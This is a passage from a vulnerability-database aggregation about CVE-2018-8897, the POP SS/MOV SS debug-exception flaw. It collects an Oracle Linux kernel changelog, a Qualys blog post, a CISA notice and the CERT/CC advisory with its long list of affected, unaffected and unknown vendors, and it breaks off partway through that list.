Coddington) [Orabug: 27928330]\n[4.1.12-124.14.4]\n- kernel.spec: add requires system-release for OL7 (Brian Maly) [Orabug: 27955380] \n- x86/kernel/traps.c: fix trace_die_notifier return value (Kris Van Hees) {CVE-2018-8897}\n- x86/entry/64: Dont use IST entry for #BP stack (Andy Lutomirski) {CVE-2018-8897}\n- kvm/x86: fix icebp instruction handling (gregkh@linuxfoundation.org) {CVE-2018-1087}", "edition": 6, "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "ELSA-2018-4096", "href": "http://linux.oracle.com/errata/ELSA-2018-4096.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2019-01-23T20:50:12", "bulletinFamily": "blog", "cvelist": ["CVE-2018-8897"], "description": "In a memorable [scene](<https://www.youtube.com/watch?v=iyHNryKojDY>) from \u201cJumpin\u2019 Jack Flash,\u201d Whoopi Goldberg struggles to understand the lyrics of the eponymous song from the Rolling Stones, as she pleads: \u201cMick, Mick, Mick, speak English!\u201d\n\nIt appears that multiple operating system vendors had similar trouble interpreting Intel and AMD debugging documentation, which led the OS vendors to independently create the same critical security flaw in their respective kernel software.\n\n\n\nThe issue came to light last week when US-CERT (United States Computer Emergency Readiness Team) [warned](<https://www.kb.cert.org/vuls/id/631579>) that under certain circumstances \u201csome operating systems or hypervisors may not expect or properly handle an Intel architecture hardware debug exception.\u201d\n\n\u201cThe error appears to be due to developer interpretation of existing documentation for certain Intel architecture interrupt/exception instructions, namely MOV to SS and POP to SS,\u201d the CERT alert reads.\n\nThe list of OS vendors affected reads like an industry \u201cwho\u2019s who.\u201d It includes Apple, Microsoft, Red Hat, VMware, Ubuntu, Xen and SUSE Linux. The problem was discovered by researcher Nick Peterson of Everdox Tech, who has detailed the flaw in a [paper](<https://everdox.net/popss.pdf>) titled \u201cPOP SS/MOV SS Vulnerability.\u201d\n\n\u201cThis is a serious security vulnerability and oversight made by operating system vendors due to unclear and perhaps even incomplete documentation on the caveats of the POP SS and MOV SS instructions and their interactions with interrupt gate semantics,\u201d wrote Peterson and co-author Nemanja Mulasmajic from Triplefault.io.\n\nIf exploited, the vulnerability ([CVE-2018-8897](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897>)), which each affected vendor has now patched, could allow attackers to create a variety of problems, including crashing the impacted system, running malicious programs on it, and tampering with data.\n\n\u201cAn authenticated attacker may be able to read sensitive data in memory or control low-level operating system functions,\u201d reads the CERT advisory.\n\nAccording to [Microsoft](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8897>), successful attackers would need to log on to the system, and run a specially-crafted application to take control of it. They could then run arbitrary code in kernel mode and \u201cinstall programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\nMore information is available from [Red Hat](<https://access.redhat.com/security/vulnerabilities/pop_ss>) and [VMware](<https://kb.vmware.com/s/article/54988>).\n\n### In other security news \u2026\n\n * There are reports of new \u201ctext bombs\u201d that can crash mobile apps like iMessage and Whatsapp, as well as iPhones and Android devices, but their impact has been greatly exaggerated, according to independent security analyst [Graham Cluley](<https://hotforsecurity.bitdefender.com/blog/text-bombs-and-black-dots-of-death-plague-whatsapp-and-imessage-users-19891.html#new_tab>). \n * The source code for the TreasureHunter malware has been leaked, which will help researchers better understand but which may trigger the creation of new variants, [reports](<https://threatpost.com/pos-malware-treasurehunter-source-code-leaked/131891/>) Tom Spring in ThreatPost.\n * LG has patched a pair of \u201csevere\u201d vulnerabilities affecting its smartphones' keyboards, [according to ThreatPost\u2019s Tara Seals](<https://threatpost.com/severe-keyboard-flaws-in-lg-smartphones-allow-remote-code-execution/131829/>).", "modified": "2018-05-14T18:47:42", "published": "2018-05-14T18:47:42", "id": "QUALYSBLOG:12D0AED8A6507BA497CB8CC165A00D0A", "href": "https://blog.qualys.com/news/2018/05/14/what-weve-got-here-is-failure-to-communicate-os-vendors-misread-cpu-docs-create-flaw", "type": "qualysblog", "title": "What we\u2019ve got here is failure to communicate: OS vendors misread CPU docs, create flaw", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisa": [{"lastseen": "2021-02-24T18:07:25", "bulletinFamily": "info", "cvelist": ["CVE-2018-8897"], "description": "CERT Coordination Center (CERT/CC) has released information for [CVE-2018-8897](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897>) \u2013 unexpected behavior for debug exceptions. A local attacker could exploit this bug to obtain sensitive information.\n\nNCCIC encourages users and administrators to review CERT/CC\u2019s [Vulnerability Note VU #631579](<https://www.kb.cert.org/vuls/id/631579>) for more information and refer to operating system or software vendors for appropriate patches.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2018/05/08/Debug-Exception-May-Cause-Unexpected-Behavior>); we'd welcome your feedback.\n", "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "CISA:C1D0E305B2191ADE13845CF38D356802", "href": "https://us-cert.cisa.gov/ncas/current-activity/2018/05/08/Debug-Exception-May-Cause-Unexpected-Behavior", "type": "cisa", "title": "Debug Exception May Cause Unexpected Behavior", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:44:06", "bulletinFamily": "info", "cvelist": ["CVE-2018-8897"], "description": "### Overview \n\nIn some circumstances, some operating systems or hypervisors may not expect or properly handle an Intel architecture hardware debug exception. The error appears to be due to developer interpretation of existing documentation for certain Intel architecture interrupt/exception instructions, namely MOV SS and POP SS.\n\n### Description \n\n[**CWE-703**](<http://cwe.mitre.org/data/definitions/703.html>)**: Improper Check or Handling of Exceptional Conditions - **CVE-2018-8897\n\nThe MOV SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A; section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV SS or POP SS instruction itself). Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol 3A; section 2.3). \n \nIf the instruction following the MOV SS or POP SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at Current Privilege Level (CPL) &lt; 3, a debug exception is delivered after the transfer to CPL &lt; 3 is complete. Such deferred #DB exceptions by MOV SS and POP SS may result in unexpected behavior. \n \nTherefore, in certain circumstances after the use of certain Intel x86-64 architecture instructions, a debug exception pointing to data in a lower ring (for most operating systems, the kernel Ring 0 level) is made available to operating system components running in Ring 3. This may allow an attacker to utilize operating system APIs to gain access to sensitive memory information or control low-level operating system functions. \n \nSeveral operating systems appear to incorrectly handle this exception due to interpretation of potentially unclear existing documentation and guidance on the use of these instructions. \n \nMore details can be found in the [researcher's paper](<https://everdox.net/popss.pdf>). \n \n--- \n \n### Impact \n\nAn authenticated attacker may be able to read sensitive data in memory or control low-level operating system functions, \n \n--- \n \n### Solution \n\n**Apply an update** \n \nCheck with your operating system or software vendor for updates to address this issue. There is no expected performance impact for applying an update. A list of affected vendors and currently-known updates is provided below. \n \n--- \n \n### Vendor Information\n\n631579\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple __ Affected\n\nNotified: May 01, 2018 Updated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nApple has released a [Security Update 2018-001](<https://support.apple.com/en-us/HT208742>) to address this issue.\n\n### Vendor References\n\n * <https://support.apple.com/en-us/HT208742>\n\n### Check Point Software Technologies __ Affected\n\nNotified: May 01, 2018 Updated: May 10, 2018 \n\n**Statement Date: May 10, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCheck Point sees these as non-exploitable, taking our business logic and best practices into consideration. \n \nSee details at SecureKnowledge [sk126534](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk126534>).\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&amp;solutionid=sk126534](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk126534>)\n\n### DragonFly BSD Project Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### FreeBSD Project __ Affected\n\nNotified: April 30, 2018 Updated: May 07, 2018 \n\n**Statement Date: May 07, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nMore information is available in the [FreeBSD Security Advisory 18:06](<https://security.freebsd.org/advisories/FreeBSD-SA-18:06.debugreg.asc>).\n\n### Vendor References\n\n * <https://security.FreeBSD.org/advisories/FreeBSD-SA-18:06.debugreg.asc>\n\n### Linux Kernel __ Affected\n\nUpdated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe issue was fixed upstream on March 23, with Linux \"stable\" branches was fixed shortly thereafter. Therefore the following kernels (or higher) contain the patch: 4.15.14, 4.14.31, 4.9.91, 4.4.125. The older 4.1, 3.16, and 3.2 branches are also affected.\n\n### Microsoft __ Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n**Statement Date: May 01, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n**The update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.**\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8897>\n\n### Red Hat, Inc. __ Affected\n\nNotified: May 01, 2018 Updated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nRed Hat Enterprise Linux is affected. Please see the [security advisory](<https://access.redhat.com/security/vulnerabilities/pop_ss>) for more information.\n\n### Vendor References\n\n * <https://access.redhat.com/security/vulnerabilities/pop_ss>\n\n### Ubuntu Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubuntu __ Affected\n\nNotified: May 01, 2018 Updated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPlease see Ubuntu Security Notices [USN-3641-1](<https://usn.ubuntu.com/3641-1/>) and [USN-3641-2](<https://usn.ubuntu.com/3641-2/>) for more details.\n\n### Vendor References\n\n * <https://usn.ubuntu.com/3641-1/>\n * <https://usn.ubuntu.com/3641-2/>\n\n### VMware __ Affected\n\nNotified: May 01, 2018 Updated: May 07, 2018 \n\n**Statement Date: May 07, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nVMware has issued a [statement](<https://kb.vmware.com/s/article/54988>) about this vulnerability report. Please see the statement for full details.\n\n### Vendor References\n\n * <https://kb.vmware.com/s/article/54988>\n\n### Xen __ Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n**Statement Date: May 01, 2018**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAll versions of Xen are vulnerable. Only x86 systems are vulnerable. ARM systems are not vulnerable. \n \nOnly x86 PV guests can exploit the vulnerability. x86 HVM and PVH guests cannot exploit the vulnerability. \n \nAn attacker needs to be able to control hardware debugging facilities to exploit the vulnerability, but such permissions are typically available to unprivileged users. \n \n \nMITIGATION \n========== \n \nRunning only HVM or PVH guests avoids the vulnerability. \n \nNote however that a compromised device model (running in dom0 or a stub domain) can carry out this attack, so users with HVM domains are also advised to patch their systems. \n \n \nRESOLUTION \n========== \nApplying the appropriate attached patch resolves this issue.\n\n### Vendor Information \n\nFor the full statement, please see [Xen Advisory 260](<https://xenbits.xen.org/xsa/advisory-260.html>).\n\n### Vendor References\n\n * <https://xenbits.xen.org/xsa/advisory-260.html>\n\n### Brocade Communication Systems Not Affected\n\nNotified: May 01, 2018 Updated: May 30, 2018 \n\n**Statement Date: May 27, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Intel __ Not Affected\n\nNotified: May 01, 2018 Updated: May 09, 2018 \n\n**Statement Date: May 05, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nAt this time, we are not aware of any Intel Products affected by CVE-2018-8897.\n\n### Vendor References\n\n * [httpwww.intel.com/sdm](<httpwww.intel.com/sdm>)\n\n### Joyent __ Not Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nSmartOS does not allow access to the debug register outside of debug mode and so is not affected.\n\n### NetBSD __ Not Affected\n\nNotified: May 01, 2018 Updated: May 01, 2018 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nNetBSD does not support debug register and so is not affected.\n\n### OpenBSD Not Affected\n\nNotified: May 01, 2018 Updated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QUALCOMM Incorporated Not Affected\n\nNotified: May 01, 2018 Updated: June 06, 2018 \n\n**Statement Date: June 05, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ZyXEL __ Not Affected\n\nNotified: May 01, 2018 Updated: May 21, 2018 \n\n**Statement Date: May 14, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNo Zyxel products are vulnerable to unexpected operating system behavior resulting from an Intel architecture hardware debug exception, as reported in [CERT/CC] vulnerability note VU#631579 at <https://www.kb.cert.org/vuls/id/631579>. \n\n### Vendor Information \n\nZyxel has issued Zyxel-SA-1135-01 stating that no products are affected.\n\n### eero Not Affected\n\nNotified: May 01, 2018 Updated: May 08, 2018 \n\n**Statement Date: May 08, 2018**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### 3com Inc Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ACCESS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ADTRAN Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ARRIS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ASP Linux Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AT&amp;T Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AVM GmbH Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Actiontec Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AirWatch Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Android Open Source Project Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Appgate Network Security Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Arch Linux Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Arista Networks, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Aruba Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AsusTek Computer Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Avaya, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Belkin, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### BlackBerry Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### BlueCat Networks, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Broadcom Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### CA Technologies Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cambium Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cisco Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Command Software Systems Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### CoreOS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### D-Link Systems, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Debian GNU/Linux Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Dell Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Dell EMC Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### DesktopBSD Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Deutsche Telekom Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Devicescape Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Digi International Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### EfficientIP SAS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Espressif Systems Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Extreme Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### F-Secure Corporation Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Force10 Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### GNU glibc Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Geexbox Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Gentoo Linux Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Google Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### HTC Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### HardenedBSD Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hitachi Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Honeywell Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Huawei Technologies Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### IBM Corporation (zseries) Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM, INC. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### InfoExpress, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Internet Systems Consortium Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Internet Systems Consortium - DHCP Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Interniche Technologies, inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Juniper Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lancope 